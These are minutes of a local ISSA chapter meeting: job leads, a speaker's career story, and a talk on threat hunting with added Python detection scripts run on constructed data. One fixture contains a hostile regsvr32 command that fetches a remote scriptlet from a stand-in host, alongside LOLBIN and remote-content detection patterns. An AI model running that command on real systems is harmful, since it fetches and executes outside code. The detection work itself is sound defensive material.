ISSA Monthly Meeting: 11 July 2023:

WELCOME/AGENDA:

Roops opens the meeting and welcomes attendees to the July 2023 ISSA meeting. Admin: the meeting is hybrid (in person and Zoom); after the meeting, please give feedback on what we can improve. He goes over the topics intended to be covered, including discussing changes to and looking over the board structure and bylaws, membership, vote concerns, meetings, and new board members.

MEMBERSHIP BENEFITS:

ISSA membership helps IT professionals stay current, hear industry leaders speak, and pursue professional development. It also provides CPEs/CEUs, best practices and practical solutions, and employment opportunities.
Three people have gotten jobs from our last cyber social! Great to know those connections are being made. There is a student discount for membership; reach out to Charles.

EDUCATION:

Certification resources, videos, and lots more; we encourage you to check out the website (https://issa-hr.org/security-resources, https://issa-hr.org/reading-list).
Some examples of resources: video education and tools, some of which are free, such as Cybrary, INE, Pluralsight and CBT Nuggets, all a step above YouTube and great for building knowledge and skills.

Featured book of the month: The Cyber Effect (author here); last month's was The Art of Invisibility. The education chair manages the book club; if you'd like to learn more, get in touch.
Reading list: a case on a US teenager indicted for credential stuffing against a sports betting website.
MANY more resources are available on the website.

NATIONAL CONFERENCES:

DEF CON and Black Hat, InfoSec World 2023

LOCAL CONFERENCES:

VirginiaCyberEducon (Charlottesville, VA; very educator-focused), SANS Virginia Beach 2023 (Aug 21 - Sep 1, Virginia Beach, VA)

GOVT RELATED:

3rd Annual Critical Infrastructure Security Summit (July 26-27, Alexandria, VA)
5th Annual Information Warfare Symposium (July 26-27, National Harbor, MD)
4th Annual Digital Forensics for National Security Symposium (August 2-3, College Park, MD)


MEETINGS and SOCIAL EVENTS:

Next social event: 19 July at The Casual Pint at 7 PM (early birds at 5:30). One of the ROM inventors was at the last social! Wild! That is the kind of variety you can see at these events.
August: Charles Herring (WitFoo CTO). September: TBD. October: Adam Shostack (Shostack & Associates). November: John Bos (Cybrex LLC founder/CEO). Looking for a presentation speaker for September and for next year, as well as backup speakers. After this meeting: networking happy hour at Plaza Dellogado.

NEED A JOB: HAVE A JOB:

Based on board meetings, it’s been determined to go over this prior to the speaker.

NEED A JOB:

It is good to have a prepared elevator pitch. It is not required, but this segment is a good time to practice (about 30 seconds is average). Include a greeting (your FULL name), your past (what you have done and for how long), your present (what you are doing now) and your future (what you want to do or pursue): intro, summary of what you do, your value, what problem you can solve, and a call to action. Also include items such as clearance, remote or on-site preference, willingness to relocate, additional education or certs not covered in the pitch, and any other short details. We can post your email in the chat if you want, and we will ensure it gets to anyone interested.

HAVE A JOB:

John B: has some possible jobs: contingent hires while proposing, staffing up the workforce; if the proposal is approved, the job is possible. Sometimes it takes a long time, and nothing is binding about a contingent-hire role. Currently in the midst of a proposal: staffing instructors at the Naval War College in RI, good for a military operating background. Not management, but it is remote; cloud people, IT systems work. If you join an effort as a contingent hire you are not obligated, but it is a possibility.
Johnnie S: works at SAIC at the service desk (NMCI SIPR). To date there are two contracts and one offer resulting from our meetings. SAIC will reimburse Sec+ if you obtain it through them (required within the first 6 months), and SAIC is one of the contractor entities that will sponsor clearance vetting.
Melissa B (speaker): works at Tanium, an endpoint security operations management company. They are expanding the support center, with 8 weeks of paid training to learn the platform, and moving to an IT support center model (for folks without dedicated account management support). Troubleshooting, entry-level work, no requirement for 5 years in security; for other requirements, talk to Melissa. She has been at Tanium just over 3 years; they invest in growth. There is a paid internship cycle: they start taking applications in autumn, and decisions are made in January/February.

Ken: Sentara is hiring in the SOC: junior SOC analysts and architects, plus an internship (paid; send your resume to Charles if interested).
John: companies can find interns through subsidized state grants.


SPEAKER PRESENTATION: Melissa Bischoping from Tanium: PART I

Melissa Bischoping, Endpoint security research director at Tanium.
SANS MSISE Student 2023
Passionate about incident response, memory forensics, threat intelligence, purple team ops.


Career: "Luck is what happens when preparation meets opportunity" (Seneca).
Teenage mother; went into pre-nursing but hated it; worked as a managing aviation records clerk; while doing receptionist work she learned she might be good in the IT project field. The technical side of her career spans six years. She got her foot in the door through college experience and an internship where her husband was stationed.

Melissa left for Louisiana early to start the internship (IT at a casino) and was able to live in a room at the casino while waiting for her husband's transfer: three weeks of casino life, during which she attended war rooms, looked over shoulders and spent as much time as she could learning. The casino did not have the budget to keep her on, but she was so determined that her supervisor got in touch with casinos across the nation and found one across the street. She got a job with them working in IT for seven weeks. On her first day she was brought into the office, set up a PXE system and was able to image dozens of computers, which opened the door to her next job and a 20k raise.

The same company got hit with ransomware while she worked there. She was finishing her degree and practicing on HackTheBox, working through the processes and learning what she could, and she recognized the log from that experience and was able to help out. When asked what she wanted to do, she was offered a title in cybersecurity management and led an MSSP project; at this point her husband was due to transfer again. Melissa got a call from the DC area, without even knowing who the customer was.
Over the years she was able to work in DC at levels of scale not previously known to her.

Now, as endpoint security research director, she was able to write her own job description; she writes code and detections that run on millions of devices. She wants to show us that in IT there is no linear path. Tech pivots quickly; don't be the person who doesn't want to try new programs. LANs, CTFs (she is on the SANS CTF team), be curious, do puzzles, read about other domains: education technology helps you be more well-rounded and understand empathy.


A.C.E. the H.A.C.K.: Adaptability, Curiosity, Empathy; Humility, Approachability, Credibility, Kindness. Melissa points to the benefits that come with asking for mentorship, taking on mentees, and making yourself available; give feedback in a kind way. Integrity is HUGE at Tanium: accept failure, proactively disclose mistakes, DON'T BS. Praise and recognition go a long way. Don't be "out for glory"; it "doesn't matter where you are in the pecking order". YOU create culture through little moments of kindness (feedback, a compliment, a friendly email or follow-up) that bring loyalty and appreciation in a business; kindness helps build bridges.

PART II: THREAT HUNTING OPPORTUNITIES ACROSS THE KILL CHAIN:

Fundamental IT hygiene:

Like Maslow's hierarchy, there is a security hierarchy of needs; these levels help identify where you are and where you need to go next. Each tier depends on the one below it. The base level is INVENTORY (What is ours?): if you don't know what you have, you can't protect all of it. Next (Who is that?): identify unusual behavior. Then (Do I expect that?): detect deviations and anomalies; this is as important as EDR alerts.
Detection opportunities: no attack is invisible, ESPECIALLY not in memory ("it can run but it cannot hide"). Melissa looks for abnormalities in memory forensics, but there are tons of places these attacks can be detected: endpoints, network, cloud, application.

LOLBINS/LOLBAS:

Already on the OS (eventvwr.exe, certutil.exe, cmd.exe, dllhost.exe, regsvr32.exe, rundll32.exe, control.exe, mshta.exe and MORE), vendor-signed, and leveraged at every stage of an attack. The LOLBAS Project lists 184 candidates.
Detecting modern attack behavior: look for anomalies, proactively detect your own misconfigurations, and understand "exploitability" vs. "vulnerability". Attacks are human-operated and can change on the fly; individual signals may be dismissed until viewed holistically.

Attacker Behavior:

Multiple paths to profit: ransom, extortion. Visibility and correlation allow multiple opportunities for detection and disruption.


“Dumb/Different/Dangerous”
Dumb: security theater, blind spots, missteps, bad configs that lead to easy wins for attacker.
Different: Things that make you tilt your head—usually worth looking into.
Dangerous: High likelihood to be evidence of a threat actor’s behavior, warrants IMMEDIATE attention.

Initial access and execution:

Paths to success: phishing, stolen credentials, access brokering, vulnerable public-facing services (RDP, VPN, public networks). Anomaly detection: the least-occurring behaviors in a data set. "Users" are normal, but is their behavior? The goal is to reduce noise and highlight what is interesting and different.

Dumb: Vulnerable public-facing services: RDP, VPN, Vulnerable public/internal services, Users as local admins.
Different: DNS anomalies, user-agent strings, nonstandard port/traffic combinations, TLDs, locations of interest.
Dangerous: Uptick in password failures (can indicate brute force), uncommon remote logins, “first seen” locations/systems for a user, Mailbox forwarding rules.
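The three "Dangerous" items above are all the same kind of check: compare a logon against what that user has done before and surface what is new or rare. Added example, not from the talk or the minutes, in Python over a constructed set of logon events (usernames, hosts and source countries are made up): a per-user "first seen" check, a brute-force burst check, and a list of the least-occurring user/source/host combinations.

```python
"""Added example: 'first seen', brute-force burst and rarity checks over logon events."""
from collections import Counter, defaultdict, deque

# Constructed sample logon events (not real data).
# 't' is minutes since midnight; 'src' is the geolocated source country.
EVENTS = [
    {"t": 540,  "user": "alice",      "src": "US", "host": "WKS-01", "ok": True},
    {"t": 545,  "user": "alice",      "src": "US", "host": "WKS-01", "ok": True},
    {"t": 550,  "user": "bob",        "src": "US", "host": "WKS-02", "ok": True},
    {"t": 560,  "user": "carol",      "src": "US", "host": "WKS-03", "ok": True},
    {"t": 600,  "user": "bob",        "src": "US", "host": "WKS-02", "ok": True},
    {"t": 1380, "user": "bob",        "src": "RO", "host": "VPN-GW", "ok": False},
    {"t": 1381, "user": "bob",        "src": "RO", "host": "VPN-GW", "ok": False},
    {"t": 1382, "user": "bob",        "src": "RO", "host": "VPN-GW", "ok": False},
    {"t": 1383, "user": "bob",        "src": "RO", "host": "VPN-GW", "ok": False},
    {"t": 1384, "user": "bob",        "src": "RO", "host": "VPN-GW", "ok": False},
    {"t": 1385, "user": "bob",        "src": "RO", "host": "VPN-GW", "ok": False},
    {"t": 1388, "user": "bob",        "src": "RO", "host": "VPN-GW", "ok": True},
    {"t": 1390, "user": "svc_backup", "src": "US", "host": "FS-01",  "ok": True},
    {"t": 1395, "user": "svc_backup", "src": "US", "host": "DC-01",  "ok": True},
]


def first_seen(events, field):
    """Successful logons where `field` ('src' or 'host') is new for a user who
    already has a history of successes. A user's very first logon only seeds
    the profile; it is not reported."""
    profile = defaultdict(set)
    hits = []
    for e in sorted(events, key=lambda e: e["t"]):
        if not e["ok"]:
            continue
        seen = profile[e["user"]]
        if seen and e[field] not in seen:
            hits.append((e["user"], e[field], e["t"]))
        seen.add(e[field])
    return hits


def failure_bursts(events, window=10, threshold=5):
    """Users whose failed logons reach `threshold` within `window` minutes.
    Returns (user, host, minute the threshold was crossed), once per user."""
    recent = defaultdict(deque)
    hits, flagged = [], set()
    for e in sorted(events, key=lambda e: e["t"]):
        if e["ok"] or e["user"] in flagged:
            continue
        q = recent[e["user"]]
        q.append(e["t"])
        while q and e["t"] - q[0] > window:   # drop failures outside the window
            q.popleft()
        if len(q) >= threshold:
            hits.append((e["user"], e["host"], e["t"]))
            flagged.add(e["user"])
    return hits


def rarest_behaviors(events, n=3):
    """Least-occurring (user, src, host) combinations among successful logons:
    a cheap way to surface what is different without knowing what is bad."""
    counts = Counter((e["user"], e["src"], e["host"]) for e in events if e["ok"])
    return sorted(counts.items(), key=lambda kv: (kv[1], kv[0]))[:n]


if __name__ == "__main__":
    print("first-seen country:", first_seen(EVENTS, "src"))
    print("first-seen host:   ", first_seen(EVENTS, "host"))
    print("failure bursts:    ", failure_bursts(EVENTS))
    print("rarest:            ", rarest_behaviors(EVENTS))
```

The brute-force check fires once bob's fifth failure lands inside the window, and the "first seen" check fires only on the success that follows, which is the event worth paging on: a new country and a new host for an account that was getting hammered a few minutes earlier.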

Persistence:

First goal after compromise is to create a way to get back in by way of: install/replace/abuse LOLBINS, registry modifications, new local users/admins, autorun/startup/Winlogon, WMI Event subscriptions, remote assistance apps/backdoors, C2 frameworks, fileless malware. Detection can be difficult, unless you: know parent-child process relationships, correlate network, and endpoint activity.

Dumb: blindly trusting Office templates and "Protected View".
Different: binary replacement, autoruns/scheduled tasks, nonstandard protocol use, user account changes.
Dangerous: LOLBINs with URLs, .net/.eu/.ru TLDs, GitHub/Pastebin/etc. addresses, or exe/image extensions in their command lines; processes that normally don't use the network now doing so. Knowing the attack method helps you in the long run.
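Added example (not from the talk or from Tanium): the parent/child and process-to-network correlation described above, in Python over a constructed process list and connection list. The LOLBIN set is a hand-picked subset of the LOLBAS project's list, the Office parent set and the "expected to use the network" baseline are assumptions for the sample, and the regex for remote content is a heuristic covering the URL, TLD and paste-site patterns the talk lists.

```python
"""Added example: parent/child relationships correlated with LOLBIN use and network activity."""
import re

# Hand-picked subset of the LOLBAS project's list (https://lolbas-project.github.io/); an assumption.
LOLBINS = {"certutil.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe", "cmd.exe", "dllhost.exe",
           "control.exe", "eventvwr.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Processes expected to open network connections on this (constructed) baseline.
NET_BASELINE = {"chrome.exe", "msedge.exe", "outlook.exe", "teams.exe", "svchost.exe"}
# Heuristic for the command-line content the talk calls out: URLs, .net/.eu/.ru TLDs, paste/code hosts.
REMOTE_CONTENT = re.compile(r"https?://|\.(?:ru|eu|net)\b|github\.com|pastebin\.com", re.I)

# Constructed process-creation and connection events (not real data).
PROCS = [
    {"pid": 400, "ppid": 4,   "image": "svchost.exe",  "cmd": "svchost.exe -k netsvcs"},
    {"pid": 501, "ppid": 300, "image": "winword.exe",  "cmd": "WINWORD.EXE invoice.docm"},
    {"pid": 502, "ppid": 501, "image": "cmd.exe",
     "cmd": "cmd.exe /c regsvr32 /s /u /i:https://cdn.example.net/a.sct scrobj.dll"},
    {"pid": 503, "ppid": 502, "image": "regsvr32.exe",
     "cmd": "regsvr32 /s /u /i:https://cdn.example.net/a.sct scrobj.dll"},
    {"pid": 600, "ppid": 300, "image": "chrome.exe",   "cmd": "chrome.exe"},
    {"pid": 700, "ppid": 300, "image": "notepad.exe",  "cmd": "notepad.exe notes.txt"},
]
NET = [
    {"pid": 600, "dst": "142.250.0.1", "port": 443},
    {"pid": 503, "dst": "203.0.113.9", "port": 443},
    {"pid": 700, "dst": "203.0.113.9", "port": 8080},
]


def ancestry(procs, pid):
    """Image names from the oldest known ancestor down to `pid`."""
    by_pid = {p["pid"]: p for p in procs}
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid]["image"])
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


def persistence_signals(procs, net):
    """Three correlations: an Office app spawning a LOLBIN, a LOLBIN command line pointing
    at remote content, and a connection from a process outside the network baseline."""
    by_pid = {p["pid"]: p for p in procs}
    signals = []
    for p in procs:
        parent = by_pid.get(p["ppid"])
        parent_image = parent["image"] if parent else "<unknown>"
        if parent_image in OFFICE and p["image"] in LOLBINS:
            signals.append(("office-spawned-lolbin", p["pid"], f"{parent_image} -> {p['image']}"))
        if p["image"] in LOLBINS and REMOTE_CONTENT.search(p["cmd"]):
            signals.append(("lolbin-remote-content", p["pid"], p["cmd"]))
    for n in net:
        image = by_pid[n["pid"]]["image"] if n["pid"] in by_pid else "<unknown>"
        if image not in NET_BASELINE:
            signals.append(("unexpected-network", n["pid"], f"{image} -> {n['dst']}:{n['port']}"))
    return signals


def signals_by_chain(procs, signals):
    """Count signals per process chain (keyed by the root pid); several signals on
    one chain is the 'viewed holistically' case that moves Different to Dangerous."""
    by_pid = {p["pid"]: p for p in procs}
    counts = {}
    for _, pid, _ in signals:
        root = pid
        while root in by_pid and by_pid[root]["ppid"] in by_pid:
            root = by_pid[root]["ppid"]
        counts[root] = counts.get(root, 0) + 1
    return counts


if __name__ == "__main__":
    sigs = persistence_signals(PROCS, NET)
    for s in sigs:
        print(s)
    print("chain:", " -> ".join(ancestry(PROCS, 503)))
    print("per chain:", signals_by_chain(PROCS, sigs))
```

Each rule on its own is a "Different": cmd.exe under Word happens in the wild, regsvr32 reaching out to a URL is a known LOLBAS pattern, and notepad.exe talking to an external host is merely odd. Grouped by chain, the Word document's descendants carry four signals, which is the kind of correlation the talk says makes the difference.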

Privilege Escalation/Lateral Movement:

Any opportunity to expand reach and gather new access is attractive to an adversary. Increased access: User > service account, user > system, user > another user. Obfuscate behind multiple accounts, blend in with “trusted” accounts. Methods: account takeover, pass-the-hash, Unattended answer files, autologin credentials, leverage legitimate services (SMB, RDP)

Dumb: autologin/unattend .xml files and plaintext passwords stored on disk, scheduled task environment variables, permissions creep over time, open access to system admin tools (WMI, PsExec, remote access).
Different: unusual child processes of common UAC-bypass binaries, unfamiliar/new/first-time east-west traffic, service accounts with interactive logons.
Dangerous: users simultaneously logged in to multiple systems; on-premises logins from remote workers, and vice versa.

Defense Evasion:

Disrupting tooling: modifying firewall rules, event logs, exclusions, malicious binaries masquerading as legitimate, Bring-Your-Own-Vulnerable-Driver (BYOVD). Camouflage and covering tracks: Purchasing expired categorized domains, Mark-of-the-Web Bypass.

Dumb: not turning on Script Block logging, Assuming signed = trusted, Wildcard exclusions.
Different: Configuration scope creep, Zip/ISO files (MotW bypass), Abuse of trusted/benign protocols (Discord, Teams, etc.)
Dangerous: Security tooling is disabled or modified, process injection, Leveraging BYOVD.

Discovery/Enumeration:

Bursts of discovery commands, unusual PowerShell connections, unusual parent processes for network activity. Enumeration of OS and AD information, users/groups, network shares and permissions, services, open ports, apps, security tooling, LOLBINs/LOLBAS, network configuration: all of this is easy to miss or dismiss as uninteresting; correlation is key!

Dumb: blocking Nmap will NOT save you; not turning on Script Block logging.
Different: unusual users or service accounts enumerating.
Dangerous: common enumeration commands are not dangerous UNTIL you have multiple detections; odd command-line arguments (e.g. svchost.exe -p 80,22,443).
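Added example (not from the talk): the "not dangerous UNTIL multiple" rule as code. It counts distinct enumeration commands per host and user inside a short window and flags only when a burst reaches a threshold; separately it flags svchost.exe launched without the -k service-group argument the real binary always receives from the service control manager (the svchost.exe -p 80,22,443 case above, a port list the real svchost.exe never takes). The command categories, window and threshold are assumptions; the events are constructed.

```python
"""Added example: enumeration-burst and svchost masquerade checks over constructed command events."""
from collections import defaultdict, deque

# Constructed process-creation events (not real data); 't' is minutes since the first event.
COMMANDS = [
    {"t": 0,  "host": "WKS-02", "user": "bob",    "cmd": "whoami /all"},
    {"t": 1,  "host": "WKS-02", "user": "bob",    "cmd": "net user /domain"},
    {"t": 1,  "host": "WKS-02", "user": "bob",    "cmd": 'net group "Domain Admins" /domain'},
    {"t": 2,  "host": "WKS-02", "user": "bob",    "cmd": "nltest /dclist:corp"},
    {"t": 3,  "host": "WKS-02", "user": "bob",    "cmd": "ipconfig /all"},
    {"t": 30, "host": "WKS-05", "user": "carol",  "cmd": "ipconfig /all"},
    {"t": 45, "host": "WKS-05", "user": "carol",  "cmd": "whoami"},
    {"t": 50, "host": "WKS-02", "user": "bob",    "cmd": "svchost.exe -p 80,22,443 10.0.0.0/24"},
    {"t": 51, "host": "WKS-01", "user": "SYSTEM", "cmd": "svchost.exe -k netsvcs -p -s Schedule"},
]

# Assumed category table: first token (and, for `net`, the subcommand) of common discovery commands.
ENUM_TOOLS = {"whoami", "nltest", "ipconfig", "systeminfo", "tasklist", "quser",
              "netstat", "nslookup", "dsquery", "arp", "route", "qwinsta"}
NET_SUBCOMMANDS = {"user", "group", "localgroup", "view", "share", "accounts"}


def _basename(token):
    """Strip a Windows path and a trailing .exe from a command token."""
    name = token.rsplit("\\", 1)[-1]
    return name[:-4] if name.endswith(".exe") else name


def enum_category(cmd):
    """Label such as 'whoami' or 'net group' if this is a discovery command, else None."""
    parts = cmd.strip().lower().split()
    if not parts:
        return None
    exe = _basename(parts[0])
    if exe == "net" and len(parts) > 1 and parts[1] in NET_SUBCOMMANDS:
        return f"net {parts[1]}"
    return exe if exe in ENUM_TOOLS else None


def enumeration_bursts(events, window=5, threshold=4):
    """Flag a (host, user) once when `threshold` distinct discovery commands occur
    within `window` minutes. One command alone never fires."""
    recent = defaultdict(deque)
    hits, flagged = [], set()
    for e in sorted(events, key=lambda e: e["t"]):
        cat = enum_category(e["cmd"])
        key = (e["host"], e["user"])
        if cat is None or key in flagged:
            continue
        q = recent[key]
        q.append((e["t"], cat))
        while q and e["t"] - q[0][0] > window:
            q.popleft()
        distinct = sorted({c for _, c in q})
        if len(distinct) >= threshold:
            hits.append((e["host"], e["user"], e["t"], distinct))
            flagged.add(key)
    return hits


def svchost_masquerades(events):
    """Real svchost.exe is started by the service control manager with '-k <group>'
    (heuristic); a command line without -k is something else wearing the name."""
    hits = []
    for e in events:
        parts = e["cmd"].lower().split()
        if parts and parts[0].rsplit("\\", 1)[-1] == "svchost.exe" and "-k" not in parts:
            hits.append((e["host"], e["user"], e["cmd"]))
    return hits


if __name__ == "__main__":
    print(enumeration_bursts(COMMANDS))
    print(svchost_masquerades(COMMANDS))
```

carol's two commands fifteen minutes apart never reach the threshold, which is the intended behaviour: a help-desk tech running ipconfig is a "Different" at most. bob's four distinct commands in two minutes do, and the bogus svchost.exe a few minutes later on the same host is the second detection that makes the chain worth an immediate look.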

Data Collection and Exfiltration:

Staging of files/folders, service disruption and exfiltration: temporary directories, archive utilities/commands, FTP/file-sharing apps, upload to an attacker-hosted website, anomalous east-west traffic. Stopping applications that may hold locks on files of interest for exfiltration/encryption: Exchange, SQL, etc. Large amounts of data over encrypted channels (who's sending 20 GB of data over DNS?). Are you doing break-and-inspect? Otherwise, your only detection is the amount of data.


Dumb: something the sysadmin did that allowed exfiltration to happen; unapproved FTP/file-share/collaboration tools installed on the endpoint.
Different: zip files in odd directories, sudden account access to many files, an uptick in disk reads/writes outside normal business behavior/hours.
Dangerous: anomalies in traffic. If there is a large amount of data headed to a strange IP address, you have a problem. Could you say what a normal amount of traffic looks like on a given protocol? Would you detect a sudden uptick in data?
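Added example (not from the talk): answering "what does a normal amount of traffic look like?" with a per-host, per-protocol baseline. The daily egress totals, known destinations and flow records are constructed; the z-score and ratio thresholds are assumptions. The block flags the 20 GB-over-DNS case, reports hosts that have no baseline at all (you cannot call something abnormal without a normal), and lists large transfers to destinations a host has never talked to before.

```python
"""Added example: per-host, per-protocol egress baselines and new-destination transfers."""
import statistics

# Constructed daily egress totals in bytes per (host, protocol) for the last five days (not real data).
HISTORY = {
    ("WKS-02", "dns"):   [48_000, 52_000, 50_000, 49_000, 51_000],
    ("WKS-02", "https"): [1_900_000_000, 2_100_000_000, 2_000_000_000, 1_950_000_000, 2_050_000_000],
    ("FS-01",  "smb"):   [800_000_000, 820_000_000, 790_000_000, 810_000_000, 805_000_000],
}
TODAY = {
    ("WKS-02", "dns"):   20_000_000_000,   # 20 GB over DNS
    ("WKS-02", "https"): 2_100_000_000,
    ("FS-01",  "smb"):   825_000_000,
    ("WKS-09", "https"): 5_000_000_000,    # host with no baseline at all
}
# Destinations each host has talked to before, and today's flows (constructed).
KNOWN_DST = {"WKS-02": {"10.0.0.53", "142.250.0.1"}, "FS-01": {"10.0.2.15", "10.0.2.16"}}
FLOWS_TODAY = [
    {"host": "WKS-02", "dst": "203.0.113.9",  "proto": "dns",   "bytes": 20_000_000_000},
    {"host": "WKS-02", "dst": "142.250.0.1",  "proto": "https", "bytes": 2_100_000_000},
    {"host": "FS-01",  "dst": "10.0.2.15",    "proto": "smb",   "bytes": 825_000_000},
    {"host": "WKS-09", "dst": "198.51.100.7", "proto": "https", "bytes": 5_000_000_000},
]


def volume_anomalies(history, today, z=3.0, min_ratio=5.0):
    """(host, proto) whose egress today is far above its own baseline: more than `z`
    standard deviations above the mean, or at least `min_ratio` times the mean.
    Keys with too little history are returned separately rather than silently skipped."""
    hits, no_baseline = [], []
    for key, value in today.items():
        hist = history.get(key)
        if not hist or len(hist) < 3:
            no_baseline.append(key)
            continue
        mean, sd = statistics.fmean(hist), statistics.pstdev(hist)
        if sd:
            score = (value - mean) / sd
        else:  # flat history: any increase is infinitely unusual
            score = float("inf") if value > mean else 0.0
        ratio = value / mean
        if score > z or ratio >= min_ratio:
            hits.append((key, round(ratio, 1)))
    return hits, no_baseline


def new_destination_transfers(flows, known, min_bytes=1_000_000_000):
    """Transfers of at least `min_bytes` to a destination the host has never talked to."""
    return [(f["host"], f["dst"], f["bytes"]) for f in flows
            if f["bytes"] >= min_bytes and f["dst"] not in known.get(f["host"], set())]


if __name__ == "__main__":
    hits, no_baseline = volume_anomalies(HISTORY, TODAY)
    print("volume anomalies:", hits)
    print("no baseline:     ", no_baseline)
    print("new destinations:", new_destination_transfers(FLOWS_TODAY, KNOWN_DST))
```

The workstation's HTTPS and the file server's SMB both ran a little above their mean today and are left alone; the DNS total is four hundred thousand times its baseline and needs no packet inspection to stand out. The second check catches the case the first cannot: WKS-09 has no history, so its 5 GB to a never-seen address is reported by destination rather than by volume.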

What do we do now?:

Where on this list might you have missed a detection opportunity?
1. Map your network
2. Scan your network
3. Map your network again (if you found something new/unusual)
4. Discover and inventory hardware assets
5. Discover and inventory software assets
6. Document your data flows
7. Approve those data flows
8. Make 1-7 a source with REAL-TIME data and update CONSTANTLY
9. Lock down unapproved elements
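Added example (not from the talk): steps 4 to 9 reduced to two reconciliations, inventory versus scan results and observed flows versus approved flows. The addresses, hostnames and rules are constructed. The point the code makes is that an approved-flow rule written by network range will happily approve traffic from an asset you did not know you had, so the two checks have to be combined before anything is locked down.

```python
"""Added example: reconcile inventory against a scan, and observed flows against approved flows."""
import ipaddress

# Constructed data (not from the talk): what we believe we own vs. what the scan actually found.
INVENTORY = {"10.0.1.10": "DC-01", "10.0.1.20": "FS-01", "10.0.2.15": "WKS-02", "10.0.2.16": "WKS-03"}
SCANNED = {"10.0.1.10", "10.0.1.20", "10.0.2.15", "10.0.2.99"}   # WKS-03 silent; 10.0.2.99 unknown

# Approved data flows: (source network, destination network, destination port). Anything else is not.
APPROVED = [
    ("10.0.2.0/24", "10.0.1.10/32", 445),   # workstations -> DC, SMB
    ("10.0.2.0/24", "10.0.1.10/32", 389),   # workstations -> DC, LDAP
    ("10.0.2.0/24", "10.0.1.20/32", 445),   # workstations -> file server
    ("10.0.2.0/24", "0.0.0.0/0", 443),      # web egress
]
OBSERVED = [
    ("10.0.2.15", "10.0.1.10", 445),
    ("10.0.2.15", "203.0.113.9", 443),
    ("10.0.2.15", "10.0.1.20", 3389),   # RDP to the file server: no rule covers it
    ("10.0.2.99", "10.0.1.10", 389),    # matches the LDAP rule, but from an asset we do not own
]


def reconcile_assets(inventory, scanned):
    """Addresses the scan found that are not in inventory, and inventory entries the scan did not see."""
    known = set(inventory)
    return {"unknown": sorted(scanned - known), "missing": sorted(known - scanned)}


def review_flows(observed, approved, inventory):
    """One finding per flow that needs action: the source is not an inventoried asset,
    or no approved rule covers the (source, destination, port) triple."""
    rules = [(ipaddress.ip_network(s), ipaddress.ip_network(d), p) for s, d, p in approved]
    findings = []
    for src, dst, port in observed:
        s, d = ipaddress.ip_address(src), ipaddress.ip_address(dst)
        covered = any(s in sn and d in dn and port == p for sn, dn, p in rules)
        if src not in inventory:
            findings.append(("unknown-source", (src, dst, port)))
        elif not covered:
            findings.append(("unapproved-flow", (src, dst, port)))
    return findings


if __name__ == "__main__":
    print(reconcile_assets(INVENTORY, SCANNED))
    for finding in review_flows(OBSERVED, APPROVED, INVENTORY):
        print(finding)
```

Run on a schedule with live scan and flow data in place of the literals above, the two result sets are the working list for step 9: the unknown host gets isolated or inventoried, the RDP session to the file server gets a rule or a block, and the missing workstation gets a ticket to find out why it stopped answering.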


